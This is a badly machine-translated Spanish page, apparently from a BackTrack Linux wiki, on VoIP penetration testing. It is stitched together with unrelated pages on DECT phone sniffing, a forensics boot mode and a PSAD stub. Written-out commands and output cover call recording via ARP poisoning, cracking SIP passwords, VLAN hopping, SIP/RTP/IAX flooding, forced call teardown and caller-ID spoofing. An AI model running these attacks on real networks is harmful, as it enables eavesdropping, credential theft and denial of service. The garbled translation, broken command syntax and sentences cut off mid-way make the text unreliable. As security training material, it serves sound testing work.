Wireshark tiene una caracterstica muy bien para decodificar llamadas VoIP capturados los datos en formato de audio reproducibles Usted puede encontrar esta caracterstica en las estadsticas -> Llamadas VoIP men.
Voipong
Voipong es una utilidad que detecta todas las llamadas de voz sobre IP en una tubera, y para aquellos que estn G711 codificado, los vertederos de conversacin real a archivos de onda diferentes. Es compatible con SIP, H323, protocolo de cliente de Cisco Delgado, RTP y RTCP. Voipong se encuentra en retroceso "/ pentest / voip / voipong" directorio Antes de poder utilizar voipong tendremos que hacer algunos cambios en el archivo voipong.conf:
root @ bt :/ pentest / voip / voipong # nano / etc voipong.conf soxpath = / usr / bin / sox networksfile = / pentest / voip / voipong / etc / voipongnets outdir = / pentest / voip / voipong / salida / device = eth0 # su tarjeta de interfaz de red nombre
Una vez voipong detecta una llamada de telfono se iniciar capturarlo una vez que termine de voipong se detendr el proceso de captura y lo hacen a un fichero wave jugable. Toda la conversacin se guardar en el directorio "/ pentest / voip / voipong / salida" carpeta
Vomitar
Vomit convierte un telfono Cisco IP RTP conversacin en un archivo de sonido que se puede jugar con los jugadores sanos normales. Vomit requiere un archivo de salida de tcpdump. Con el fin de obtener vomitar en marcha tendremos que descargar e instalar WavePlay Consguelo aqu: http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5731.html
root @ bt: ~ # tar-xzvf WavePlay-20010924.tar.gz WavePlay-20010924 /
waveplay-20010924/Makefile waveplay-20010924/waveplay.c waveplay-20010924/waveplay.ja.1 waveplay-20010924/wavefmt.h waveplay-20010924/README waveplay-20010924/waveplay.1 waveplay-20010924/README.jp root @ bt: ~ # cd WavePlay-20010924 root @ bt: ~ / WavePlay-20010924 # make cc-c-o waveplay.o waveplay.c waveplay.o cc-o WavePlay root @ bt: ~ / WavePlay-20010924 # cp WavePlay / usr / bin / root @ bt :/ pentest / voip / vmito # / vmitos sip.dump r |. WavePlay-S8000-B16-C1
UCsniff
UCSniff es un video de VoIP e IP Seguridad herramienta de evaluacin que integra el software de cdigo abierto que existe en varias caractersticas tiles, lo que permite VoIP y Video IP propietarios y profesionales de seguridad a prueba rpidamente por la amenaza de espionaje no autorizado VoIP y Video. UCSniff apoya envenenamiento ARP, VLAN Hopping, VLAN descubrimiento a travs de CDP, tiene una capacidad de rastreadores y ms ... Lo considero como un todo en una herramienta de espionaje. Echemos un vistazo a algunos ejemplos de uso: UCSniff puede operar en los modos 2 Modo Monitor - En caso de ser utilizado en un medio compartido donde los telfonos IP conectados a saber: un HUB, punto de acceso inalmbrico, se puede tambin utilizar en un entorno conmutado mediante el establecimiento de una sesin SPAN en un switch Cisco. Hombre en el modo medio - Este modo tiene 2 modos adicionales que son Modo de aprendizaje Modo Dirigido Preparacin UCSniff por lo que puede ejecutar desde cualquier lugar de dar marcha atrs:
root @ bt :/ tmp # cd / pentest / voip / ucsniff / root @ bt :/ pentest / voip / ucsniff #. / configure root @ bt :/ pentest / voip / ucsniff # make root @ bt :/ pentest / voip / ucsniff # make install
A partir Unificado oler ... Advertencia: Asegrese de que usted golpea 'q' cuando haya terminado con este programa. Advertencia: 'q' re-ARP a las vctimas. Si no lo hace antes de la salida del programa dar lugar a una denegacin de servicio. SIP llamada en curso. (Extensin 200, ip 192.168.1.104) llamando al (extensin 201, ip 192.168.1.118) SIP llamada en curso. (Extensin 200, ip 192.168.1.105) llamando al (extensin 201, ip 192.168.1.104) SIP Call terminado. Conversacin grabada en el archivo '200-Calling-201-5 :2:7-3-dos. Wav ' SIP Call terminado. Conversacin grabada en el archivo '200-Calling-201-5 :2:8-2-dos. Wav ' Cierre de interfaz de texto ... Unificado olfateando se detuvo.
Podemos parar las sesiones pulsando la tecla Q. Varios archivos han sido creados por UCSniff: Los archivos de registro - Contiene informacin detallada sobre los archivos PCAP transacciones sip - archivo de captura que se puede ver en Wireshark audio wav - archivos de las conversaciones de audio
root @ bt :/ tmp / ucsniff # ls-l total de 376 -Rw-r - r -. 1 root root 40854 05 de febrero 05:02 200 Calling-201-5 :2:7-3-ambos wav -Rw-r - r -. 1 root root 115818 05 de febrero 05:02 200 Calling-201-5 :2:7-3 pcap -Rw-r - r -. 1 root root 46294 05 de febrero 05:02 200 Calling-201-5 :2:8-2-wav tanto -Rw-r - r -. 1 root root 103940 05 de febrero 05:02 200 Calling-201-5 :2:8-2 pcap -Rw-r - r - 1 root root 278 05 de febrero 05:02 call_detail_log -Rw-r - r - 1 root root 317 05 de febrero 05:02 call_log -Rw-r - r - 1 root root 10063 05 de febrero 05:02 sip.log -Rw-r - r - 1 root root 39073 05 de febrero 05:02 sipdump.pcap -Rw-r - r - 1 root root 0 05 de febrero 05:01 skinny_log
MITM Learning Modo de uso: Este modo utiliza un protocolo de sealizacin (SIP, Skinny) para asignar extensiones a un direcciones IP. Puede personalizar los objetivos para interceptar slo direcciones IP especficas o redes. En el siguiente ejemplo se supone que estamos en el UCSniff VoIP VLAN Arp envenenar a todos los hosts de la subred.
root @ bt :/ tmp / ucsniff # ucsniff-i eth0 / / / / UCSniff 2,1 escuchar a partir del eth0 ... (Ethernet) eth0 -> 00:0 C: 29:84:98: 192.168.1.105 255.255.255.0 B2 Asignaron al azar a 255 hosts para la digitalizacin de ... El escaneo de la mscara de red total para 255 hosts ... * | ================================================ ==> | 100,00% vctimas de envenenamiento ARP: Grupo 1: Cualquier grupo (todos los hosts de la lista) 2: ANY (todos los hosts de la lista) entrada asignada nuevo objetivo: (IP: 192.168.1.118) -> Extensin 201 y nombre: entrada asignada nuevo objetivo: (IP: 192.168.1.104) -> Extensin 200 y nombre: Llamada SIP en curso. (Extensin 201, ip 192.168.1.118) llamando al (extensin 200, ip 192.168.1.104) SIP Llamada finalizada. Conversacin grabada en el archivo '201-Calling-200-5 :13:4-2-dos. Interfaz wav 'Clausura de texto ... ARP envenenador desactivado. RE-ARPing las vctimas ... Unificado olfateando se detuvo.
Si echamos un vistazo a los archivos de registro UCSniff podemos ver los objetivos descubiertos utilizados en el ataque.
root @ bt :/ tmp / ucsniff # cat targets.txt 192.168.1.118,201, sip 192.168.1.104,200, sip
MITM modo de objetivo Target Mode permite espionaje en una capa superior que slo corrientes aleatorias de audio o la direccin IP de los telfonos para los que no conocen la extensin. Este modo tiene dos modos secundarios: El usuario Targeted Targeted Conversacin Podemos agregar destinos manualmente a la "targets.txt" archivo en el siguiente formato: xxxx, extensin, sip 192.168.1.118,201, SIP o utilizar el modo de aprendizaje para el descubrimiento automtico hosts
root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T UCSniff 2,1 de partida Targets.txt El archivo no se puede abrir para lectura en el directorio de trabajo No hay objetivos han sido previamente descubierto en el archivo Targets, targets.txt Por favor, ejecute UCSniff en el modo de aprendizaje, o manualmente editar targets.txt
Una vez que un archivo vlido targets.txt se encuentra, se le pedir que seleccione un modo de escucha:
root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T UCSniff 2,1 de partida Analizados 2 entradas en el archivo Targets, targets.txt UCSniff ejecuta en modo de destino. Analizada 2 objetivos previamente descubiertos Por favor, seleccione un modo de espionaje dirigida: 1. Usuario Descripcin: interceptar todas las llamadas desde o hacia un punto final determinado. 2. Conversacin Descripcin: espiar a los flujos de conversacin bidireccional entre dos puntos finales seleccionados. Por favor, seleccione la opcin (1) o (2):
Si selecciona "Usuario" indica a la herramienta para interceptar todo el trfico entre el Blanco, y el resto de la red.
En "Conversacin", dos puntos finales se seleccionan y la red es ARP envenenada para interceptar slo el trfico entre los dos usuarios.
UCSniff incluye las herramientas ms tiles y los ataques de los modos como el salto de VLAN (usando ACE) que se discutirn ms adelante.
Xplico
Aunque Xplico no est en el directorio Backtrack voip herramientas, es una herramienta muy til para capturar trfico SIP y RTP (entre otros protocolos). Xplico se puede encontrar en el Backtrack -> Digital Forensics - men Herramientas> Anlisis Forense
En caso de que no est presente en la instalacin Backtrack slo tiene que instalar con el comando siguiente:
root @ bt: ~ # apt-get install xplico
Xplico se puede utilizar para capturar trfico en tiempo real o importar un archivo PCAP Wireshark captura. De cualquier manera Xplico decodificar los paquetes capturados y les montamos en el formato adecuado en nuestro caso ser SIP y RTP. Despus de ejecutar Xplico le pedir que inicie sesin, el nombre de usuario y contrasea por defecto son: xplico
Una vez que haya iniciado sesin para Xplico tendremos que crear un caso
Tendremos que elegir entre una captura vivo o importar un archivo PCAP En este ejemplo vamos a utilizar Xplico para realizar una captura en vivo (vamos a Arp envenenar nuestros objetivos en segundo plano usando arpspoof). Ahora tendremos que elegir nuestro caso y crear una nueva sesin
Al elegir nuestra sesin recin creada veremos nuestra pgina de estadsticas principal con la opcin de elegir nuestro adaptador de red e iniciar / detener el proceso de captura.
SIPDump a escribir la respuesta al desafo de autenticacin en el archivo especificado que se ve de la siguiente manera: Vamos a disscuss agrietamiento estos desafos en el captulo autenticacin contrario.
Atacar autenticacin
SIP puede ser susceptible a dos tipos de ataques de autenticacin, antes de echar un vistazo a estos ataques tipo vamos a entender cmo es un registro SIP y el proceso de autenticacin se lleva a cabo. SIP utiliza una autenticacin implcita que es un mecanismo que utiliza el protocolo HTTP y conocido como HTTP digest. Debido a que SIP es un protocolo basado en ASCII los detalles de autenticacin son ordenadas con el fin de evitar el transporte en texto claro. Cuando un cliente SIP (User Agent) quiere autenticar con un servidor SIP, el servidor genera y enva un desafo digest al cliente, que contiene los siguientes parmetros:
Realm - se usa para identificar las credenciales dentro como mensaje SIP, por lo general es el dominio SIP Nonce -. Esto es una cadena md5 nico que es generado por el servidor para cada solicitud de registro que est hecho de un sello de tiempo y una frase secreta para asegurar tiene una vida til limitada y no se poda ser utilizado de nuevo. Una vez que el cliente recibe el desafo digest y el usuario introduce sus credenciales el cliente utiliza el nonce para generar una respuesta digest y lo enva de vuelta al servidor.
Dicho esto, vamos a tratar de descifrar la respuesta digest con el fin de obtener una contrasea vlida de SIP cuenta.
SIPCrack uso:
root @ bt :/ pentest / voip / sipcrack #. / sipcrack SIPcrack 0,3 (MaJoMu | www.codito.de) ---------------------------------------Uso: sipcrack [opciones] [-s |-w ] Logins = Archivo que contiene olfate por Opciones SIPdump:-s = stdin uso de contraseas lista de palabras-w = archivo que contiene todas las contraseas a probar-p num = proceso de impresin de craqueo contraseas cada n (-w) (ATENCIN: se ralentiza en gran medida) * O -w o-s tiene que ser dada
Ataque de diccionario Backtrack ofrece algunos diccionarios bsicos que se encuentran en:
root @ bt :/ pentest / passwords / listas de palabras
Sin embargo, para el propsito de este artculo voy a utilizar otra herramienta en la parrilla Crunch retroceder llamada que se utiliza para crear diccionarios personalizados. Vamos a utilizar para crear un crujido crujido seis caracteres numricos diccionario se encuentra en:
Crunch de uso:
uso: crunch [-F / ruta / a / charset.lst charset-name] [-o wordlist.txt] [-t [FIXED] @ @ @ @] [-s Startblock] [-c nmero]
root @ bt :/ pentest / passwords / crunch #. / crunch 6 6-f charset.lst numrico-o / pentest / voip / sipcrack / sipass.txt Crunch generar ahora 7000000 bytes de datos Crunch ahora generar 6 MB de datos Crunch ahora genera 0 GB de datos 100%
Vamos a utilizar un credenciales previamente capturados por SIPDump sip almacenados en el archivo auth.txt ans sipass.txt como diccionario (que hemos creado utilizando crunch)
Descifrando la respuesta Digest:
root @ bt :/ pentest / voip / sipcrack #. / sipcrack-w auth.txt sipass.txt SIPcrack 0,3 (MaJoMu | www.codito.de) ---------------------------------------* Se encuentra Cuentas: Num Cliente Servidor Hash usuario | contrasea 1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd * Seleccione la entrada de roer (1 - 1): 1 * Generacin de hash MD5 esttica ... 0a84f78fde66bb15197eab961462dc2f * A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd') * Lista de palabras Cargado: 'sipass.txt' * A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd') * Se ha intentado 123457 contraseas en 0 segundos * Contrasea Encontrados: '123456 ' * Actualizacin del archivo de volcado 'auth.txt' ... hecho
Ataque de fuerza bruta con John The Ripper Para este modo de ataque que usaremos John the ripper para redirigir la salida johns en el archivo FIFO que vamos a alimentar a SIPCrack. Creacin de un archivo FIFO:
root @ bt :/ tmp # mkfifo sipcrack
Generando contraseas usando john y redirigir la salida a nuestro fichero FIFO, para este ejemplo vamos a generar hasta 6 dgitos solamente.
root @ bt: ~ # john [*] Este script le llevar a / pentest / passwords / jtr / [*] A partir de ah, ejecute. / John root @ bt :/ pentest / passwords / JTR # / john -. incremental = dgitos-stdout = 6> / tmp / sipcrack
VLAN Hopping
Por lo general, el trfico de VoIP se conecta a una VLAN dedicada (Virtual LAN), como vimos en la seccin topologas. Esto significa que no se puede interceptar el trfico de VoIP por inhalacin e
intoxicacin Arp. La razn de ello es que una VLAN es como una red independiente, tiene su propio dominio de broadcast y rango de IP diferente a la red de datos. VLAN salto es una forma de "saltar" a otra VLAN, por suerte para nosotros Backtrack incluye las herramientas necesarias para llevar a cabo este ataque. Una topologa comn es cuando el telfono IP tiene un built-in "Switch interno", por lo general el PC est conectado a la toma PC y el telfono mvil se conecta desde su lan / sw socket con el conmutador de red de la siguiente manera:
Un conmutador CISCO tpica configuracin de puertos para VoIP se ver algo como:
Switch # conf t Introduzca los comandos de configuracin, uno por lnea. Terminar con CTRL / Z. Switch (config) # interface FastEthernet 0/1 Switch (config-if) # switchport modo de acceso Switch (config-if) # switchport access vlan 10 Switch (config-if) # switchport voz vlan 20
El telfono IP se configurar con la ID de VLAN correspondiente (20) y el trfico de datos PC fluir a travs de la VLAN 10. Antes de comenzar saltando alrededor, tendremos que activar el soporte para el protocolo 802.1q en Backtrack escribiendo:
root @ bt: ~ # modprobe 8021q
VoIP Hopper
VoIP tolva se utiliza para saltar a la VLAN de voz por comportarse como un telfono IP, soporta conmutadores especficos y es compatible con algunos modelos de telfonos IP. Actualmente soporta las marcas como: Cisco, Avaya y Nortel. VoIP tolva fue diseado para ejecutarse en Backtrack Linux y actualmente cuenta con las siguientes caractersticas: DHCP Client, generador de CDP, la suplantacin de direcciones MAC y VLAN salto. Voiphopper uso:
root @ bt :/ pentest / voip / voiphopper #. / voiphopper voiphopper-i <interface>-c {0 | 1 | 2}-a-n-v <VLANID> Por favor, especifique una opcin de modo de base: CDP Sniff Mode (-c 0) Ejemplo: voiphopper-i eth0-c 0 CDP Spoof modo de paquete personalizado (-c 1): -D (ID de dispositivo) -P (Port ID) -C (Capacidades) -L (Plataforma) -S (Software) -U (Duplex) Ejemplo: voiphopper-i eth0-c 1-E 'SIP00070EEA5086'-P 'Port 1' Host-C-L 'Cisco IP Phone 7940'-S 'P003-08-8-00-1-U CDP Spoof modo de pre-hechos paquetes (-c 2) Ejemplo: voiphopper-i eth0-c 2 Avaya modo DHCP Opcin (-a):
Ejemplo: voiphopper-i eth0-a Modo VLAN Hop (-v ID de VLAN): Ejemplo: voiphopper-i eth0-v 200 Nortel modo DHCP Opcin (-n): Ejemplo: voiphopper-i eth0-n
VoIP Hopper ofrece muchos modos de ataque por favor utiliza el h-para obtener informacin detallada. Echemos un vistazo a un ejemplo de la inhalacin de CDP y ejecutar un salto de VLAN en la VLAN de voz en un entorno de Cisco. Ejecutar VoIP Hopper en la interfaz de Ethernet, de la siguiente manera:
root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-c 0
VoIP Hopper tambin le permite a uno Hop VLAN a VLAN arbitraria, sin oler a CDP. Si usted ya conoce la voz VLAN ID o le gustara Hop VLAN a otra VLAN slo tiene que especificar el ID de VLAN.
root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-v 20 VoIP Hopper 1,00 Ejecucin en modo VLAN Hop ~ Tratar de saltar a la VLAN 2 Aadido VLAN 20 a la interfaz eth0 Intentando dhcp solicitud de nueva interfaz eth0.20 eth0.20 Enlace encap: Ethernet HWaddr 00:0 c: 29:84:98: b2 inet6 addr: fe80 :: 20c: 29ff: FE84: 98b2/64 Alcance: Enlace UP NOTRAILERS BROADCAST RUNNING MULTICAST MTU: 1500 Mtrica: 1 RX packets: 0 errores: 0 cado: 0 sobrecostos: 0 frame: 0 TX paquetes: 9 errores: 0 cado: 0 sobrecostos: 0 carrier: 0 colisiones: 0 txqueuelen: 0 RX bytes: 0 (0.0 B) TX bytes: 2274 (2.2 KB)
ACE
ACE es una herramienta ms para VLAN salto muy similar a Voiphopper en el uso e incluyen una opcin para descubrir tambin los servidores de TFTP (servidores de configuracin). ACE uso:
root @ bt :/ pentest / voip / as #. / as ACE v1.0: Automated corporativa (Datos) Enumerator Uso: as [-i interface] [-m mac address] [-t servidor tftp direccin ip |-c modo cdp |-v voz vlan id |-r interfaz vlan |-d modo verbose] -I <interface> (Obligatorio) Interfaz para olfatear / envo de paquetes -M MAC> (Obligatorio) Direccin MAC del telfono IP vctima -T <tftp servidor ip> (Opcional) Servidor tftp direccin IP -C <cdp modo 0|1> (opcional) 0 CDP oler modo, un modo de parodia CDP -V <Voice vlan <id (Opcional) Introduzca la ID de VLAN de voz -R <vlan usuario> (opcional) Elimina la interfaz VLAN -D (Opcional) verbose | modo de depuracin
No importa si se ha utilizado o voiphopper as ahora se puede interceptar el trfico de VoIP con herramientas como "ucsniff" especificando que acaba de crear la interfaz. Por ejemplo:
root @ bt :/ pentest / voip / ucsniff # ucsniff-i eth0.20 / / / /
Denial Of Service
Un ataque de denegacin de servicio en los servicios de VoIP puede hacerlo intil, causando un dao intencional a la red y la disponibilidad de los sistemas de VoIP. Este ataque puede ocurrir en dos niveles, ataques de red estndar DoS y ataques especficos de VoIP DOS. Generalmente se enviar toneladas de datos por la inundacin de la red para consumir todos sus recursos o un protocolo especfico con el fin de saturar con toneladas de peticiones. Vamos a echar un vistazo rpido de las herramientas disponibles en Backtrack
Inviteflood
Esta herramienta puede ser utilizada para inundar un objetivo con peticiones INVITE puede ser utilizada para combatir gateways SIP / apoderados y telfonos SIP.
root @ bt :/ pentest / voip / inviteflood #. / inviteflood inviteflood - Versin 2.0 09 de junio 2006 Uso: Obligatorio interfaz (por ejemplo eth0) usuario de destino (por ejemplo, "" o john.doe o 5000 o "1 +210-555-1212") dominio de destino (por ejemplo enterprise.com o una direccin IPv4) IPv4 addr objetivo de inundacin (ddd.ddd.ddd.ddd) inundacin etapa (es decir, nmero de paquetes) Opcional -Una inundacin herramienta "De:" alias (por ejemplo jane.doe)
I-IPv4 direccin IP de origen [por defecto es la direccin IP de la interfaz] -S srcport (0 - 65535) [por defecto es bien conocido puerto de descarte 9] -D DestPort (0 - 65535) [por defecto es bien conocido puerto SIP 5060] -L En lineString utilizado por SNOM [por defecto est en blanco] -S tiempo de sueo msgs btwn invitar (us) -H help - imprime este uso -V modo detallado salida
Mientras la herramienta mantiene inundando el gateway SIP, al evitar que los usuarios realicen llamadas telefnicas. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy.
Rtpflood
Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID
Iaxflood
IAXFlood es una herramienta para inundar el protocolo IAX2 que es utilizado por el asterisco PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood usage: ./iaxflood sourcename destinationname numpackets
Teardown
Teardown se utiliza para terminar una llamada mediante el envo de una peticin BYE
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag
First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id
value.
SIP/2.0 200 OK Via: SIP/2.0/UDP 192.168.1.105; sucursal = z9hG4bKkfnyfaol, recibido = 192.168.1.105; rport = 5060 De: "200" ;tag=hcykd Para: "200" ;tag=as644fe807 Call-ID: jwtgckolqnoylqf@backtrack CSeq: 134 REGISTRO User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE Compatible con: sustituye Expira: 3600 Contacto: ;expires=3600 Date: Tue, 01 Feb 2011 17:55:42 GMT Content-Length: 0
Spoofing Caller ID
Existen varios mtodos para la identificacin de llamadas spoofing que no vamos a discutir aqu, ya que requiere un conjunto diferente de herramientas y equipos que no son relevantes para este propsito artculo. Caller ID Spoofing en SIP es bastante fcil, slo tiene que cambiar la peticin SIP "INVITE" de cabecera.
INVITE sip:@127.0.0.1 SIP/2.0 A: <sip:192.168.1.104> Via: 192.168.1.104 SIP/2.0/UDP De: "Hacker Evil" Call-ID: 14810.0.1.45 CSeq: 1 INVITE Max-Forwards: 20 Contact: <sip:127.0.0.1>
Vamos a echar un vistazo a una herramienta que ya hemos discutido llamado Inviteflood que se puede
Temas del 1 S El nmero de subprocesos simultneos A nadie no el nombre de usuario de destino para sondear en cada host msf auxiliary(options) > set RHOSTS 192.168.1.130/24 Rhosts => 192.168.1.130/24 msf auxiliary(options) > run [*] 192.168.1.20 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.21 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.22 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.92 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.140 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO' [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
Ejemplo de uso:
msf auxiliary(enumerator) > set RHOSTS 192.168.1.104 RHOSTS => 192.168.1.104 msf auxiliary(enumerator) > set MINEXT 100 MINEXT => 100 msf auxiliary(enumerator) > set MAXEXT 500 MAXEXT => 500 msf auxiliary(enumerator) > set PADLEN 3 PADLEN => 3 msf auxiliary(enumerator) > run [*] Found user: 200 <sip:200@192.168.1.104> [Auth] [*] Found user: 201 <sip:201@192.168.1.104> [Auth] [*] Found user: 202 <sip:202@192.168.1.104> [Auth] [*] Found user: 203 <sip:203@192.168.1.104> [Auth] [*] Found user: 204 <sip:204@192.168.1.104>
[Auth] [*] Found user: 300 <sip:300@192.168.1.104> [Auth] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Ejemplo de uso:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104 Rhosts => 192.168.1.104 msf auxiliary(sip_invite_spoof) > run [*] Sending Fake SIP Invite to: 192.168.1.104 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Closing Words
I hope you've found this document informative, please keep in mind that Backtrack Linux provides many tools and features we haven't covered here. Take the time to browse the tools read the manuals and README's I am sure you'll find the right tool for the job. Feel free to discuss the tools and methods mentioned here in the Backtrack Linux Forums we would love to here your feedback ideas and experiences.
http://www.backtrack-linux.org/forums/
Sobre el autor
Shai rod (aka @NightRang3r) is a full time Pen Tester at Avnet Information Security & Risk Management in Israel; He holds the Offensive security OSCP and OSCE certifications (among others) and manages his blog at http://exploit.co.il
Referencias
http://en.wikipedia.org/wiki/Session_Initiation_Protocol http://tools.ietf.org/html/rfc3261 http://www.hackingvoip.com/
Este artculo fue contribuido por 5M7X. URL: http://www.back-track.de/index.php?page=team # SMTX Twitter: ! http://twitter.com/ # / 5M7X Email: 5M7X@mail.ru BIG FAT HAIRY ADVERTENCIA: ES ILEGAL grabar conversaciones telefnicas en muchos pases. Para obtener una lista de las leyes de privacidad estatales en los EE.UU.,
Contenido
[hide] 1 Qu es DECT? 1.1 El pro ble ma ? 1.2 Pro bad o en 2 Instalacin dedected 2.1 Inst alac in del rep osit orio 2.2 Inst alac in des de el cd igo fue nte 3 Instale algunas herramient as adicionales 4 Cargue los controlador es 5 Escanear
Qu es DECT?
http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications
El problema?
La mayora de los vendedores no implementar el cifrado en sus dispositivos, de forma que uno puede olerlo con determinado hardware y software. En un post anterior sobre el tema, consulte: http://www.offensive-security.com/backtrack/sniffing-dectphones-the-details/
Probado en
BackTrack 5 KDE ltimo kernel 2.6.38 con x86 Original Dosch y Amand Tipo II PCMCIA Card SIEMENS C1 Telfonos DECT configurado en modo repetidor NOTA: Este es un programa experimental que no est muy apoyado activamente ms!
Instalacin dedected
Con el fin de obtener dedected instalado en BackTrack, usted tiene las siguientes opciones: 1. Utilice dedected de los BackTrack 5 repositorios. 2. Compilar por su cuenta si usted quiere experimentar.
Si no ha introducido su Dosch y tipo Amand 2 o Tipo 3 o Voo: doo # PCMCIA tarjeta hgalo ahora! A continuacin, cargar el controlador:
root @ bt: ~ # make load
Si necesita informacin sobre el tipo de uso "ayuda". Si usted vive en la cerradura de EE.UU. a los EE.UU. / DECT 6 banda a travs de la "banda" de comandos. Vamos a permitir someverbosity:
verbo
Despus de escanear 2-3 veces a travs de todos los canales de desactivar la verbosidad, y detener la exploracin:
verbo detener
No haga caso de los telfonos que no quieren oler (por ejemplo, sus vecinos!)
Iniciar un callscan
callscan
Ahora toma el telfono DECT y hacer una llamada de prueba y espere hasta que aparezca la llamada telefnica. Asimismo, es suficiente si usted acaba de obtener un tono de marcacin. Debera ver algo como
Llamada # # # encontrado nuevo 00 82 31 33 73 en el canal 7 RSSI 34 detener
No haga caso de todos los telfonos excepto el suyo a travs del siguiente comando! IMPORTANTE!
ignorar 01 30 95 13 37
Ahora toma el telfono telefona DECT y hacer una Llamada prueba. Recomiendo llamar un "serivce tiempo diciendo" que se puede llegar a travs de un nmero de telfono normal. Usted debe obtener algo como esto:
# # # A partir AUTOREC # # # Parando DIP # # # A partir callscan # # # Intentando sincronizar en ab b0 00 82 29 # # # Tiene sincronizacin # # # Dumping dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap # # # Parando DIP
Sugerencia: si slo se puede or el ruido del telfono parece utilizar algunos de codificacin / cifrado. Puede activar el modo de repetidor en su telfono por lo que deshabilita el cifrado y se puede probar si su configuracin est funcionando correctamente.
Limpiar / Recargar
Si tiene que volver a cargar los controladores
root @ bt: ~ # cd / pentest / telefona / dedected / com-on-air_cs-linux root @ bt: ~ # make recargar
Protocolo DECT
Si usted est interesado en ms detalles del protocolo, puede abrir el archivo pcap en Wireshark.:
Forensics
Actualmente no hay texto en esta pgina. Puedes buscar este ttulo de pgina en otras pginas, o buscar en los registros relacionados .
Forensics Boot
Forensics Boot
Desde BackTrack 4 y ahora BackTrack 5 te habrs dado cuenta de que tiene un Forensics BackTrack BackTrack opcin pero qu es eso?
LiveCD y Forense
Durante mucho tiempo, ahora, Linux Live CD han sido muy tiles para fines de adquisicin forense en los casos en que, por una razn u otra no se puede utilizar un bloqueador de escritura de hardware. Cuando se configura no a las unidades de montaje automtico, y conocer un poco de la forma, un Linux Live CD puede ser un bloqueador de software de escritura maravilloso. Para un CD de Linux en vivo para ser considerado para este propsito, sin embargo, es de la mayor importancia que el uso de la CD en vivo no altera en cualquier datos de cualquier manera. Esa es la razn principal por la que BackTrack se puso en marcha en el pasado, BackTrack se montan automticamente los discos disponibles y utilizar las particiones de intercambio cuando estn disponibles, al hacer esto BackTrack pudo causar todo tipo de estragos, el cambio de los ltimos tiempos de montaje, la alteracin de datos en el disco, y as sucesivamente . Pero como BackTrack 4 y ahora BackTrack 5 que no es el caso ms. Cmo? Por lo tanto, vamos a tener la primicia. Personas forenses son a menudo detallista y muy conservador, as que cmo sabemos que es seguro de usar? Bueno, para empezar el BackTrack 5 CD en vivo se basa fuera de Casper, y no contiene secuencias de comandos del sistema de archivos de montaje automtico en absoluto. Los scripts de inicializacin del sistema se han modificado en el modo de arranque forense para que BackTrack 5 no buscar o hacer uso de cualquier particin de swap que figuran en el sistema. Todos estos scripts se han eliminado del sistema. Verificacin: Para probar esta funcionalidad, hemos probado esta modalidad de arranque con configuraciones de hardware. Para cada prueba, se tom una instantnea antes MD5 de los discos del sistema, arranca en modo de arranque BackTrack5 forense, verificado ningn sistema de archivos fueron montadas y swap no estaba en uso, hizo una serie de actividades en el sistema, a continuacin, apague el sistema hacia abajo y tom una instantnea despus de MD5. En la comparacin de las dos instantneas MD5, en cada caso eran un partido, lo que demuestra ningn cambio en los discos se ha hecho. Uso: Cuando se utilizan con fines forenses Backtrack, asegrese de que no se esperar a que un arranque sin supervisin. Arranque por defecto para Backtrack es el modo de arranque estndar, que utilizar las particiones swap si estn presentes. Hay un retraso agradable sin embargo, por lo que tendr un montn de tiempo para seleccionar el modo de arranque correcto. Tambin, por favor recuerde que esta es una distribucin de Linux. Es altamente recomendable que se familiarice con Linux antes de usar este o cualquier otro Live CD de Linux para propsitos forenses. Adems, asegrese de revisar las herramientas forenses adicionales aadidos a Backtrack 5. Nos hemos concentrado en la adicin de imgenes y herramientas de triage, pero si usted encuentra que uno de sus utilidades favoritas no est en su sitio, por favor hganoslo saber para que podamos mirar en tener agreg.
Instalar PSAD
Email: nanoquetz9l@nanotechfibers.com
Instale PSAD:
